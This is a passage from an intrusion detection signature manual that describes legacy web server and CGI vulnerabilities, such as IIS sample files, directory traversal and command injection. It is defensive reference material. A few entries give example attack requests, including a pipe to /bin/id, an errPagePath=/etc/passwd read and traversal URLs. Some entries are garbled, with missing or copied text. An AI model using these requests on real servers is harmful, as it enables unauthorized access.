allow system administrators the ability to provide HTTP based password change services to network users. The
affected files are achg.htr, aexp*.htr, and anot*.htr. Requesting one of the listed .htr files returns a form that requests
the account name, current password, and changed password. (2) These files can be used as proxies for brute force
password attacks, or to identify valid users on the system. If the account does not exist, the message "invalid domain" is
returned - if it does, but the password change was unsuccessful, the attacker is notified. This can be used against the
server and against other machines connected to the network (LAN or the Internet), by preceding the account name with
an IP address and a backslash. For example : '192.168.1.10\Administrator'. The server contacts the networked machine
through the NetBIOS session port and attempts to change the password.
Signature ID: 100
Iis_bdir cgi vulnerability
Bugtraq: 2280 Nessus: 10577
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Version 3.0 came
with a series of remote administration scripts installed in /scripts/iisadmin off the web root directory. Version 3.0 of IIS
had an ism.dll file containing an authentication scheme to prevent unauthorized access. If an IIS 3.0 installation is
upgraded to IIS 4.0 without removing these scripts, they can be accessed remotely without authentication due to
changes in the authentication methods used by IIS 4.0. One of these scripts, bdir.htr, can be used in IIS 4.0 server by a
remote attacker to obtain information about the server's directory structure. The script displays only a listing of
subdirectories of the directory specified as part of a request. This information about the server's directory structure
could potentially be used in further attacks.
16
Signature ID: 101
Microsoft IIS/PWS UNICODE Characters Decoding Command Execution Vulnerability
Signature Description: MS IIS 4.0 and 5.0 has a vulnerability in filename processing of CGI program, When IIS
receives a CGI filename request, it automatically performs two actions before completing the request. First IIS decodes
the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. Once the
security check is completed, IIS continues with the second action which involves the decoding of CGI parameters. A
flaw in IIS involves a third undocumented action, typically IIS decodes only the CGI parameter at this point, yet the
previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents
the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the
execution of arbitrary commands.
Signature ID: 102
IIS dot cnf cgi vulnerability
Industry ID: CVE-2002-1718 CVE-2002-0241 CVE-2002-1717 Bugtraq: 4084,4048,4078 Nessus: 10575
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms.A misconfigured
IIS web server may allow remote users to read sensitive information from .cnf files. These are configuration files, used
by Telnet, Windows, and other applications with varying internal formats. Example, http://target/_vti_pvt/svcacl.cnf.
Microsoft IIS 5.1 was reported with this issue.
Signature ID: 104
IIS perl.exe problem
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. It is possible to
obtain the physical location of a virtual web directory of this host by issuing the command : GET /scripts/no-suchfile.pl HTTP/1.0 in Microsoft IIS 5.0. An attacker may use this flaw to gain more information about the remote host,
and hence make more focused attacks.
Signature ID: 105
/scripts/repost.asp access vulnerability
Signature Description: Microsoft Site Server is a Internet-based commerce (or e-commerce) solution from Microsoft.
Microsoft's Site Server 2.0 allows users unrestricted access to the /users directory and it's contents with default settings.
The file /scripts/repost.asp allows users to upload files to the /users directory. Even if the directory does not exist, any
valid user can create the diectory.
Signature ID: 106
IIS vulnerable sample files access
Nessus: 10370
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Any web site
running Internet Information Server 3 or 4 with sample IIS files (IDQ, ASP and HTW) is vulnerable. Using these files
it is possible to break outside of the web virtual root and gain unathorized access to files, such as log files and in certain
cases the backup version of the Security Accounts Manager (sam._). The files are fastq.idq, query.idq, query.asp (all in
17
'/iissamples/issamples/' directory), search.idq, query.idq (all in '/iissamples/exair/search/' directory), codebrws.asp (in
'/iissamples/exair/howitworks/' directory),qsumrhit.htw and qfullhit.htw(both in '/iissamples/issamples/oop/' directory).
Signature ID: 107
IIS vulnerable sample files access
Nessus: 10370
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Any web site
running Internet Information Server 3 or 4 with sample IIS files (IDQ - Internet Data Query) is vulnerable. Using these
files it is possible to break outside of the web virtual root and gain unathorized access to files, such as log files and in
certain cases the backup version of the Security Accounts Manager (sam._). The files are author.idq, filesize.idq,
filetime.idq, queryhit.idq and simple.idq (all in '/scripts/samples/search/' directory).
Signature ID: 108
/scripts Directory accessible from external network vulnerability
Nessus: 10121,10039
Signature Description: IIS '/scripts/ directory is accessible from external network. Microsoft IIS is a popular web server
package for Windows based platforms. The directory '/scripts' is used to store multiple executable scripts used by the
website deployed on IIS. If access is give to view the contents of the folder, an attacker can gain valuable information
about which default scripts or vulnerable custom scripts are installed. No vulnerable scripts should be present in this
directory and the directory permission must be set appropriately.
Signature ID: 110
NT IIS4 /iisadmin Remote Web-Based Administration Vulnerability
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. If IIS4.0 was
installed as an upgrade to IIS 2.0 or 3.0, a DLL file (ISM.DLL) is left in the /scripts/iisadmin directory. An attacker
may use this DLL as in 'http://example/scripts/iisadmin/ism.dll?http/dir'. This URL prompts the user for a
username/password to access the remote administration console. Although approved access does not permit the user to
commit changes to the IIS server, it may allow them to gather sensitive information about the web server and its
configuration.
Signature ID: 111
OmniHTTPD imagemap.exe Buffer Overflow Vulnerability
Signature Description: OmniHTTPd is an all-purpose industry compliant web server built specifically for the Windows
95/98/NT4 platform from Omnicron Technologies Corporation. In addition to Standard CGI support, the server sports
features such as Keep-Alive connections, table auto-indexing and server-side includes. Omnicron OmniHTTPD 2.4 Pro
and Omnicron OmniHTTPD 1.1 contain a CGI called 'imagemap.exe' which is vulnerable to a buffer overflow that
allows a remote user to execute arbitrary commands with the privileges of the http server (either nobody or root).
Signature ID: 112
IMP Session Hijacking vulnerability
Signature Description: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web
18
applications which allow code injection by malicious web users into the web pages viewed by other users. Horde IMP
is a powerful web-based mail interface/client developed by members of the Horde project. It is written in PHP and
provides webmail access to IMAP and POP3 accounts. All releases of Horde IMP Webmail prior to version 2.2.7 are
vulnerable to a cross-site scripting attack which can be used by an attacker to hijack a victim's IMP session.
Signature ID: 113
Info2www CGI Input Handling Vulnerability
Signature Description: The info2www script allows HTTP server to serve information stored in the GNU Info Nodes.
GNU info nodes are hypertextual documents developed in Emacs editors which together form a multipage
documentation for users using a command line interface. They can be viewed locally using 'info' utility. The info2www
script version 1.1 or prior fail to properly parse input and can be used to execute commands on the server with
permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful
exploitation involve anything the web server process has permissions to do, including possibly web site defacement.
Signature ID: 114
SGI InfoSearch fname Vulnerability
Signature Description: The InfoSearch package converts man pages and other documentation into HTML web content.
IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on their 32- and 64-bit MIPS
architecture workstations and servers. A vulnerability exists in the 'InfoSearch' package as included by Silicon Graphics
in their IRIX operating system. In SGI IRIX 6.5.7 or prior, the search form uses 'infosrch.cgi' which does not properly
parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote
web users as demonstrated in 'http ://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id '.
Signature ID: 115
InterScan VirusWall Remote Configuration Vulnerability
Signature Description: Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend
Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at
the gateway of the network. Buffer overflows in various CGI programs in the remote administration service for Trend
Micro Interscan VirusWall 3.0.1 allow remote attackers to execute arbitrary commands. Additionally, the http daemon
used to execute these programs runs as root allowing a user to execute them directly.
Signature ID: 116
JJ sample CGI program Escape Character Vulnerability
Signature Description: The NCSA HTTPd was a web server originally developed at the NCSA by Robert McCool and
others.JJ is a sample CGI program distributed with NCSA HTTPd servers. Rob McCool jj.c 1.0 on NCSA httpd 1.5.2 a
or earlier passes unfiltered user data directly to the /bin/mail program, and as such can be used to escape to a shell using
the ~ character. The attacker must know the password the program requests, but by default the program uses
HTTPdRocKs or SDGROCKS. These default passwords must be changed in the program's source code. A successful
attacker can run arbitrary code with the privileges of the httpd server.
19
Signature ID: 117
Allaire JRun 2.3.x Sample Files Vulnerability
Signature Description: JRun is a Java application server, originally developed as a Java Servlet engine by Live
Software and subsequently purchased by Allaire. A number of vulnerabilities in Allaire JRun 2.3.x allow remote
attackers to obtain sensitive information, e.g. listing HttpSession ID's via the 'SessionServlet' servlet, the file system
information using viewsource.jsp. This information can be used in subsequent attacks. The vulnerabilities exist in
documentation, sample code, examples, and applications as well as tutorials which are shipped as part of the server.
This signature detects access to vulnerable viewsource.jsp file.
Signature ID: 118
Allaire JRun Directory Listing vulnerability
Signature Description: JRun is a Java application server, originally developed as a Java Servlet engine by Live
Software and subsequently purchased by Allaire. The 'WEB-INF' directory contains metadata about the application
deployed on the server. Allaire JRun 3.0 http servlet server allows remote attackers to directly access the WEB-INF
directory via a URL request that contains an extra "/" in the beginning of the request as in 'http://target//WEB-INF/'.
This may also be exploited by submitting the maliciously crafted URL via a HTTP GET request using utilities like
netcat or telnet.
Signature ID: 120
KW Whois Remote Command Execution Vulnerability
Signature Description: WHOIS is a TCP-based query/response protocol which is widely used for querying an official
database in order to determine the owner of a domain name, an IP address, or an autonomous system number on the
Internet. Kootenay Web Inc whois is a web interface to 'whois' command on a linux server. Kootenay Web Inc whois
1.0 does not check the user input properly. Hence, using shell meta characters like ' ; ', an attacker can trick the script
into executing arbitrary code on the host system.
Signature ID: 121
Check for listrec.pl vulnerability
Signature Description: Textor Webmasters Ltd offers a series of pre-packaged web content management solutions.
Textor Webmasters Ltd.'s listrec.pl CGI program allows remote attackers to execute arbitrary commands, via shell meta
characters like ';' in the TEMPLATE parameter, with the privileges of the web server.
Signature ID: 122
Lotus Notes ?OpenServer Information Disclosure vulnerability
Signature Description: Lotus Domino is an Application server designed to aid workgroups and collaboration on
projects and offers SMTP, POP3, IMAP, LDAP, and web services that allow users to interact with Lotus Notes
databases. Multiple versions of Domino Web server have a special URL, 'http://myserver/?OpenServer', which
generates a page containing a list of all the databases on the server. The database names are active links, so you can
open a database just by clicking a name. This is a convenient shortcut for administrators or designers working on a
20
Web site. The access settings for this URL can be either 'allow all' or 'allow no one'. An attacker can gain valuable
information if the access is given to this URL. Hence access to this information must be restricted.
Signature ID: 123
Endymion MailMan ALTERNATE_TEMPLATES File Disclosure vulnerabilities
Signature Description: Endymion MailMan is a web-email interface application written in Perl, commonly used on
Linux systems. A vulnerability exists in versions of Endymion MailMan Webmail prior version 3.0.26. Affected
versions make insecure use of the perl open() function. Attackers can control the way open() is supposed to work and
execute arbitrary commands.These commands will be executed with the privilege level of the CGI script. This
vulnerability may allow remote attackers to gain interactive 'local' access on the target server.
Signature ID: 124
Mailnews.cgi Username Remote Shell Commands Vulnerability
Signature Description: Mailnews is a CGI script that helps administrators operate their mailing list efficiently, by
among other things allowing them to allow remote users to subscribe and unsubscribe from the mailing list.
mailnews.cgi 1.3 and earlier allow remote attackers to execute arbitrary commands via a user name that contains shell
metacharacters. A remote attacker can insert a new user to the mailnews' user file which includes malicious shell
commands in the username field. Upon displaying this this data, the embedded commands will execute with the
privileges of the webserver process.
Signature ID: 125
MiniVend Piped command vulnerability
Signature Description: MiniVend is an e-commerce system developed originally by Mike Heins. MiniVend version
4.04 and earlier come with a sample storefront which is vulnerable. The file VIEW_PAGE.HTML does not parse user
input to check for a pipe as part of an input filename. The UTIL.PM uses the perl OPEN function to check for the
existence of the supplied filename without any validation, allowing piped commands to be executed.
Signature ID: 126
IIS ctss.idc access vulnerability
Nessus: 10359
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Microsoft IIS 3.0
contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ctss.idc
example file, which does not sanitize user-supplied input.The mkilog.exe is a Common Gateway Interface (CGI) script
that can be used to view and modify SQL database contents.It posts data to vulnerable module, ctss,idc, that creates a
table based on the parameters passed to it. Data Source Name, User ID, and Password must be known to exploit this
vulnerability.
Signature ID: 128
NT Options pack MDAC RDS Vulnerability
Signature Description: Windows NT is a family of operating systems produced by Microsoft. The Windows NT
21
Option Pack is a set of Web and application services that enables developers to create the next generation of distributed
network applications for Windows NT Server. Microsoft IIS is a popular web server package for Windows based
platforms. MDAC (Microsoft Data Access Components) is a package used to integrate web and database services. It
includes a component named RDS (Remote Data Services). RDS allows remote access via the internet to database
objects through IIS. Both are included in a default installation of the Windows NT 4.0 Option Pack. RDS includes a
component called the DataFactory object, which has a vulnerability that could allow any web user to 1) obtain
unauthorized access to unpublished files on the IIS server or 2) to use MDAC to tunnel ODBC requests through to a
remote location, thereby masking the source of the attack. 3) If the Microsoft JET OLE DB Provider or Microsoft
DataShape Provider are installed, a user could use the 'shell()' VBA command on the server with System privileges.
These two vulnerabilities combined can allow an attacker on the Internet to run arbitrary commands with System level
privileges on the target host. Microsoft IIS 3.0 to 4.0 and other NT based web servers using the Windows NT 4.0
options pack without an update patch are vulnerable.
Signature ID: 129
MS Personal WebServer directory traversal vulnerability
Signature Description: Microsoft Personal Web Server (PWS) is simple web server software offered by Microsoft for
the Windows operating system. PWS was developed by Microsoft for Windows 9x and Windows NT 4.0 operating
systems. Microsoft Personal Web Server 4.0 or earlier and Microsoft FrontPage Personal WebServer 1.0 parse '/..../'
string in requested URLs as '\' to the logical drive on which the site is hosted, allowing remote users to obtain
unauthenticated read access to files and directories on the same logical drive as the web content.The name and path of
the desired file must be known to the attacker.
Signature ID: 131
MultiHTML File Disclosure Vulnerability
Signature Description: MultiHTML is a web-based application for inserting a Server Side Include calls to display
HTML files. MultiHTML 1.5 is prone to a file disclosure vulnerability. The user supplied input is not sanitized before
being passed to the Perl open() function. Hence, it is possible for remote attackers to issue requests that are capable of
disclosing sensitive webserver readable resources. A valid file followed by a null byte (%00) must be requested to
exploit this vulnerability.
Signature ID: 132
/book.cgi access vulnerability
Signature Description: NC Book is a guest book package for websites. It is distributed by NetCode. NetCode Book
0.2b allows remote attackers to execute arbitrary commands via the "current" parameter by encapsulating commands in
pipe ('|') characters. Attackers can execute commands with privileges of the HTTPd process.
Signature ID: 133
Tektronix Phaser Network Printer Administration Interface Vulnerability
Signature Description: The Tektronix Phaser network printers are a series of network based printers with advanced
features like web based management. A remote vulnerability exists in Tektronix Phaser network printers in the 7xx,
8xx, and 9xx series. An attacker with access to the printer's local network can reach the printer's admin interface,
22
supported by the inbuilt Tektronix PhaserLink webserver. No authentication mechanism exists to validate such
connections. Arbitrary pages inside the printer's administration interface may be requested on the PhaserLink
webserver. Hence,by using methods like the printer's 'Emergency Power Off' or IP configuration changes, an attacker
can cause a denial of service attacks.
Signature ID: 134
Novell Web Server NDS Tree Browsing vulnerability
Signature Description: Netscape Enterprise Server was a web server developed originally by Netscape
Communications Corporation. The product has since been acquired by Sun microsystems and renamed as Sun Java
System Web Server. Netscape Enterprise Server for Novell Netware 5.1 or 5.0 contains several sample files which leak
sensitive system information like the location of web root, detailed system specific information,etc. These files are
available to remote users and can thus help attackers to attack in subsequent attacks.
Signature ID: 135
Netauth CGI Access vulnerability
Signature Description: NetWin Netauth is a Web-based email management tool. NetWin Netauth versions 4.2 and
earlier could allow a remote attacker to traverse directories and read arbitrary files on the server by supplying "dot dot"
(/../) sequences and the desired file name to the 'page' variable at the end of a request to netauth.cgi. This can be used by
an attacker to gain access to restricted information which can be used to compromise the system in subsequent attacks.
Signature ID: 136
Netscape Enterprise Server PageServices Information Disclosure Vulnerability
System Web Server. A vulnerability has been reported in Netscape Enterprise Server 4.1 SP8 and earlier. The problem
occurs while processing HTTP queries containing the '?PageServices' URI parameter. The affected server may disclose
the contents of the web root, possibly including sub-directories.
Signature ID: 137
Attempt to access /admin-serv/config/admpw
Signature Description: Netscape Communications SuiteSpot is a compilation of Netscape's Web, mail, groupware, and
directory-server offerings for corporate networks. Netscape SuiteSpot 3.5 server includes a web administration
package. The username and encrypted password for the Administrator account are kept in a world-readable file at
(webroot)/admin-serv/config/admpw. If this is accesssed by an attacker, he can crack the password by brute force.
Signature ID: 138
Netscape FastTrack 'get' request vulnerability
Signature Description: When the remote web server is issued with a lower-cased 'get' request it will return a directory
listing even if a default page such as index.html is present. Example : 'get / HTTP/1.0' will return a listing of the root
23
directory. This allows an attacker to gain valuable information about the directory structure of the remote host and
could reveal the presence of files which are not intended to be visible. Netscape FastTrack Server 3.0.1 is
vulnerable. 
Signature ID: 139
Netscape publishingXpert 2 arbitrary file disclosure vulnerability
Signature Description: Netscape publishingXpert is a solution for publishers to author, revise, stage, deliver, and
manage their own online services. PSCOErrPage.htm file in Netscape PublishingXpert 2.5 version prior to SP2 allows
remote attackers to read arbitrary files by specifying the target file in the errPagePath parameter. An example of an
exploit for this vulnerability is '/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd'.
Signature ID: 140
Netscape Enterprise Server Directory Indexing Vulnerability
System Web Server. Netscape Enterprise Server 3.0 to 3.6 with Directory Indexing enabled allows remote attackers to
list server directories via web publishing tags like ?wp-cs-dump. This information can assist an attacker in subsequent
attacks.
Signature ID: 141
Newdsn.exe File Creation Vulnerability
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Microsoft IIS 3.0
comes with a sample program called newdsn.exe, installed by default in the directory 'wwwroot/scripts/tools/'.
Execution of this program with a URL could allow for remote file creation. The file created is a Microsoft Access
Database, but can have any extension, including .html.
Signature ID: 142
WEB-CGI newsdesk.cgi access vulnerability
Signature Description: Ibrow newsdesk is a cgi script designed to allow remote administration of website news
headlines. Ibrow newsdesk.cgi 1.2 fails to properly remove '../' sequences from user-supplied input to the "t" parameter.
An attacker can use this vulnerability to reveal the contents of any file on the filesystem that is accessible to the
webserver. An attacker can use this vulnerability to his advantage by getting the password file used by newsdesk cgi
script using 't=../pass.txt'. Such information can then be used to deface the website.
Signature ID: 144
GroupWise Web Interface 'HELP' command vulnerability
Signature Description: The file Gwweb.exe is a dangerous file which can grant remote users read access to sensitive
files, file path information as well as the ability to remotely execute arbitrary code with privileges of the web server.
24
For instance, the request : http://example/cgi-bin/GW5/GWWEB.exe?HELP=some_bad_request will reveal path
information, and http://example/cgi-bin/GW5/GWWEB.exe?HELP=../../../../../../index will list .htm and .html files.
Signature ID: 145
Access to vulnerable CGI nph-publish.cgi
Signature Description: The nph-publish.cgi script allows Apache to "publish" files created with Netscape Navigator
Gold or one of the other HTML editors.This CGI has a well known directory traversal vulnerability in versions prior to
version 1.2 that allows remote attackers to overwrite arbitrary files via a .. (dot dot) in the path name for an upload
operation.
Signature ID: 146
Multiple Vendor nph-test-cgi Vulnerability
Signature Description: No Parsed Headers scripts are scripts that print the entire HTTP response including all
necessary header fields. The web server is thereby instructed not to parse the headers or add any missing headers. A
security hole exists in the nph-test-cgi script included in most UNIX based web server distributions. The problem is
that nph-test-cgi, which prints out information on the current web environment (just like 'test-cgi' does) does not
enclose its arguments to the 'echo' command inside of quotes("). Hence, an attacker can use. An attacker can hence
browse the server's file system using specially crafted GET requests.
Signature ID: 148
Oracle XSQL Sample Application Vulnerability
Nessus: 10613
Signature Description: Oracle Application Server is a J2EE-certified application server. Oracle 9i AS integrates the
technology required to develop and deploy e-business portals, transactional applications, and Web services into a single
product. It installs with sample pages that demonstrate various functions of the software. Many of these pages can be
used by attackers to breach the security of the system. Specially crafted requests to
'/xsql/java/xsql/demo/adhocsql/query.xsql' can be used to run arbitrary SQL queries(under an unprivileged account)
using 'sql' parameter. Though the user cannot modify or delete the data in the database, he can use this vulnerability to
enumerate database users and view table names.
Signature ID: 149
MacOS X Finder reveals contents of Apache Web directories vulnerability
Industry ID: CVE-2001-1446 Bugtraq: 3316,3325,3324 Nessus: 10756
Signature Description: Mac OS X is a line of computer operating systems developed, marketed, and sold by Apple
Inc,which come pre-loaded on Macintosh computers. 'Finder' is the default application program used on the Mac OS
and Mac OS X operating systems that is responsible for the overall user-management of files, disks, network volumes
and the launching of other applications. MacOS X creates a hidden file, '.DS_Store' in each directory that has been
viewed with the 'Finder'. This file contains a list of the contents of the directory. In Apple Mac OS X 10.0 to 10.0.3
having Apache Software Foundation Apache 1.3.14 Mac webserver installed, an attacker can access this file through
mixed case file requests. Accessing this file gives an attacker information about the structure and contents of the
webserver.
25
Signature ID: 150
MacOS X Finder reveals contents of Apache Web files vulnerability
Signature Description: Mac OS X is a line of computer operating systems developed, marketed, and sold by Apple
Inc,which come pre-loaded on Macintosh computers. Find-By-Content in Mac OS X 10.0 through 10.0.4 creates index
files named '.FBCIndex' in every directory. A remote attacker may read the indexed contents of files by submitting a
request for the file in a desired directory to the web server. This allows remote attackers to learn the contents of files in
web accessible directories. This information could provide an attacker with sensitive information including potential
passwords, system configuration, installed applications, etc. This information can be used by the attacker to further
compromise the security of the server in subsequent attacks.
Signature ID: 151
Outlook Web anonymous access vulnerability
Signature Description: Microsoft Exchange Server is a messaging and collaborative software product developed by
Microsoft. Exchange Server's major features consist of electronic mail, calendaring, contacts and tasks. Outlook Web
Access (OWA) in Microsoft Exchange Server 5.5 up to SP4 is vulnerable to an access validation error that may lead to
information disclosure. Due to this, an unauthenticated user can gain read access to the entire Global Address List. This
information can be used by the attacker in subsequent social enginering attacks.
Signature ID: 152
Oracle Web Listener Batch File Vulnerability
Signature Description: Oracle Web Listener is a general-purpose application server from Oracle. Oracle Web Listener
4.0.x for NT uses various batch files as cgi scripts. These are stored in the /ows-bin/ directory by default. Any of these
batch files can be used to run arbitrary commands on the server by appending '?&' and a command to the filename.
UNC paths can be used to cause the server to download and execute remote code.
Signature ID: 153
WEB-CGI pagelog.cgi directory traversal vulnerability
Signature Description: Metertek's Pagelog.cgi is a CGI script to log the details about visits to the webpages on the web
server. The script displays the number of hits and emails the logfile data about the visitors after a specified number of
visits. Directory traversal vulnerability in Metertek pagelog.cgi 1.0 allows remote attackers to read and create or
overwrite .log or .txt files via a .. (dot dot) character sequence passed to the "name" or "display" parameter.
Signature ID: 154
WebPALS Remote Command Execution Vulnerability
Signature Description: Initiated at Mankato State University in 1978, the name PALS was originally an acronym for
Project for Automated Library Systems. Originally a Minnesota State University System undertaking, PALS now
serves all of the Minnesota State Colleges and Universities. MnSCU/PALS Library System WebPALS 1.0 'pals-cgi'
26
program allows remote attackers to read arbitrary files via a .. (dot dot) charecter sequence and to execute arbitrary
commands via shell meta characters in the documentName parameter.
Signature ID: 155
PCCS-Mysql User/Password Exposure vulnerability
Signature Description: PCCS-Mysql Database Admin Tool is a web-based front end to MySQL written in PHP. PCCS
MySQLDatabase Admin Tool Manager 1.2.4 and earlier install the file dbconnect.inc within the web root, which
allows remote attackers to obtain sensitive information, such as the username and password used to connect to the
database, if it is requested via http by an attacker as demostrated in
'http://your_site.com/pccsmysqladm/incs/dbconnect.inc'.
Signature ID: 156
ActivePerl perlIS.dll Buffer Overflow vulnerability
Signature Description: ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems
developed by Activestate. ActivePerl allows for high-performance integration with IIS using a DLL called 'perlIIS.dll'
to handle a '.plx' ISAPI extension. Buffer overflow in PerlIS.dll in Activestate ActivePerl 5.6.1.629 and earlier allows
remote attackers to exute arbitrary code via an HTTP request for a long filename(greater than 350 bytes)that ends in a
.pl extension due to an unbounded string copy operation.
Signature ID: 157
Perl http Directory Disclosure Vulnerability
Signature Description: Mandrake Linux is a Linux distribution created by Mandrakesoft. It uses the RPM Package
Manager. The default configuration files for versions of mod_perl shipped with Mandrake Linux 6.1 through 7.1
contain a misconfiguration : The request to list /perl directory is allowed on the webserver as it is within webroot and
permitted. Hence, an attacker can see the listing of the files present in /perl. As a result of this information, an attacker
can target the scripts that are known to be vulnerable and are available in this directory.
Signature ID: 158
PerlCal Directory Traversal Vulnerability
Signature Description: PerlCal is a CGI script written by Acme Software that allows web-based calendar sharing and
related functions. Acme Software PerlCal 2.3 thorugh 2.95 allow remote user to traverse the filesystem of a target host
through the use of double dot '../' character sequence in the p0 parameter. This attack may lead to the disclosure of
sensitive information and may be of assistance in further attacks.
Signature ID: 159
Perl interpreter can be launched as a CGI vulnerability
Signature Description: Perl.exe is accessible from web server. The Common Gateway Interface (CGI) is a standard
protocol for interfacing external application software with a web server. To execute CGI scripts, a Web server must be
able to access the interpreter used for that script. In all web servers, there is a directory dedicated to such applications
27
known as the 'CGI bin directory'. Early documentation for Netscape and other servers recommended placing the
interpreters in the CGI bin directory to ensure that they were available to run the script.
Signature ID: 160
WEB-CGI pfdispaly.cgi arbitrary command execution vulnerability
their 32- and 64-bit MIPS architecture workstations and servers. A vulnerability exists in the 'InfoSearch' package as
included by Silicon Graphics in their IRIX operating system. A vulnerability in IRIX 6.2 through 6.4 CGI program
'pfdisplay.cgi' could allow remote users to view any file on the system with 'nobody' privileges.
Signature ID: 161
Phf Remote Command Execution Vulnerability
Signature Description: The NCSA HTTPd was a web server originally developed at the NCSA. It was among the
earliest web servers developed. The Apache HTTP Server is a web server developed and maintained by an open
community of developers under the auspices of the Apache Software Foundation. Apache web server's initial versions
were based on NCSA's httpd. A vulnerability exists in the sample cgi bin program - 'phf' as included with NCSA httpd
1.5 and Apache 1.0.3 and prior versions of both servers. By supplying certain characters arbitrary commands can be
executed by remote users with the privilages of the httpd process. This is because the phf CGI program calls the
escape_shell_cmd() function. This function is intended to filter out dangerous characters from the user input before
passing these strings along to shell based library calls, such as popen() or system(). However, it fails to filter certain
characters due to which it is possible to execute commands from these calls.
Signature ID: 162
IIS phonebook Server Buffer Overflow vulnerability
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Windows NT 4.0
and Windows 2000 are preemptive, graphical and business-oriented operating systems designed to work with either
uniprocessor or symmetric multi-processor computers. The Phone Book Service is an optional component that ships
with the NT 4 Option Pack and Windows 2000. This Service is used in conjunction with Dial Up Networking clients to
provide computers with a pre-populated list of dial-up networking servers. A buffer overflow vulnerability was
discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this
vulnerability allows an attacker to execute arbitrary code with the privileges of the IUSR_machinename account (IIS 4)
or the IWAM_machinename account (IIS 5).
Signature ID: 163
WEB-CGI php.cgi access vulnerability
Signature Description: PHP/FI (Personal Home Page / Forms Interpreter) is a software suite designed to offer enhanced
features to sites served via the World Wide Web and is maintained by the PHP development team. A problem in
PHP/FI 2.0 could allow remote users access to restricted resources. Due to a design problem in the software package,
the PHP/FI software package allows a remote user to browse directories and view files stored on the local host with the
privileges of httpd process. An attacker can gather sensitive information that he can use in subsequent attacks.
28
Signature ID: 164
PHP-Nuke Remote File (Copy/Delete) Vulnerability
Signature Description: PHP Nuke is a website creation/maintenance tool written in PHP3. PHP-Nuke versions 5.2 and
earlier suffer from a vulnerability. The vulnerability is caused by inadequate processing of queries by PHP-Nuke's
admin.php which enables attackers to copy any file off the operating system to anywhere else on the operating system
or even delete the files.
Signature ID: 165
PHP-Nuke security vulnerability (bb_smilies.php)
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. bb_smilies.php in PHP-Nuke 4.4 allows remote attackers to gain PHP administrator privileges
and read arbitrary files by inserting a null character and '..' (dot dot) sequence into a malformed username argument.
Signature ID: 166
PHP-Nuke Gallery Add-on Arbitrary File View Vulnerability
on PHP and MySQL. Bharat Mediratta Gallery is a free, open source web-based photo album which may be used as an
add-on for the PHPNuke web portal. Bharat Mediratta Gallery 1.2.2 and prior versions on Francisco Burzi PHP-Nuke
5.0 are vulnerable to the directory traversal vulnerability that allows remote user to view arbitrary files on the web
serverwith the priviliges of the web server.
Signature ID: 167
PHP-Nuke' opendir vulnerability
on PHP and MySQL. PHP-Nuke version 4.4 contains a vulnerability in the handling of the requesturl URL parameter
when passed to the opendir.php script. It is possible for a remote attacker to view the contents of files readable by the
Web server. It is also possible for the attacker to submit a URL to an external PHP script (on another host), which
would then be retrieved and included/executed. Hence, arbitrary command execution with the privileges of http server
is possible.
Signature ID: 168
PHP/FI Buffer Overflow Vulnerability
Signature Description: PHP is a computer scripting language designed for producing dynamic web pages. The PHP/FI
package which was originally written by Rasmus Lerdorf is an is an HTML-embedded scripting language. Since it's
inception PHP/FI has been turned over to another development team and is now known only as PHP. PHP PHP/FI 2.0
b10 and prior versions are vulnerable to a buffer overflow in the function FixFilename() function in file.c. If strings
with length of around 8 kilobytes are passed to the function's buffers that are 128 bytes long, the stack can be
overwritten, making it possible for an attacker to obtain shell access to the machine running the web server.
29
Signature ID: 169
Pi3Web tstisap.dll overflow vulnerability
Signature Description: John Roy Pi3Web web server is a free, multithreaded, highly configurable and extensible HTTP
server and development environment for cross platform internet server development and deployment. The ISAPI
application, tstisapi.dll in John Roy Pi3Web web server 1.0.1 has multiple vulnerabilities. A buffer overflow
vulnerability exists due to failure in properly handle user supplied input. Requesting a specially crafted URL will cause
the buffer to overflow and possibly allow the execution of arbitrary code. It is also possible to disclose the physical
path to the web root by requesting an invalid URL.
Signature ID: 170
PlusMail vulnerability
Signature Description: PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining
mailing lists, mail aliases, and web sites. In PowerScripts PlusMail WebConsole 1.0, it is possible to change the
administrative username and password without knowing the current password, by submitting the arguments
"new_login" with the value "reset password", "username" with the new login name as value, "password" and
"password1" with matching new password values to the plusmail script (typically available at /cgi-bin/plusmail). The
web console can then be used to launch a range of potentially destructive activities including changing of e-mail
aliases, mailing lists, web site editing, and various other privileged tasks.
Signature ID: 171
CGI-World Poll It Internal Variable Override Vulnerability
Signature Description: 'Poll It' is a Perl CGI application used to create and maintain opinion polls on websites. The
program relies on a number of internal variables. These variables can be overwritten by any remote user by specifying
the new value as a variable in the GET request. This is due to the fact that 'Poll It' overwrites variables to user-supplied
values after it sets them to the internally-specified defaults. This can lead to unauthorized file reads, as well as
potentially other compromises.
Signature ID: 172
Cognos Powerplay WE Vulnerability
Signature Description: Cognos Powerplay Web Edition is a commercial Business Performance Measurement and
Reporting application. It is an Online Analytical Processing(OLAP) software. In any OLAP system, the collection of
data is represented as a 'Cube'. Cognos Powerplay Web Edition 4.0 to 6.5 (inclusive) may serve data cubes in a nonsecure manner. Execution of the PowerPlay CGI pulls cube data into files in an unprotected temporary directory. These
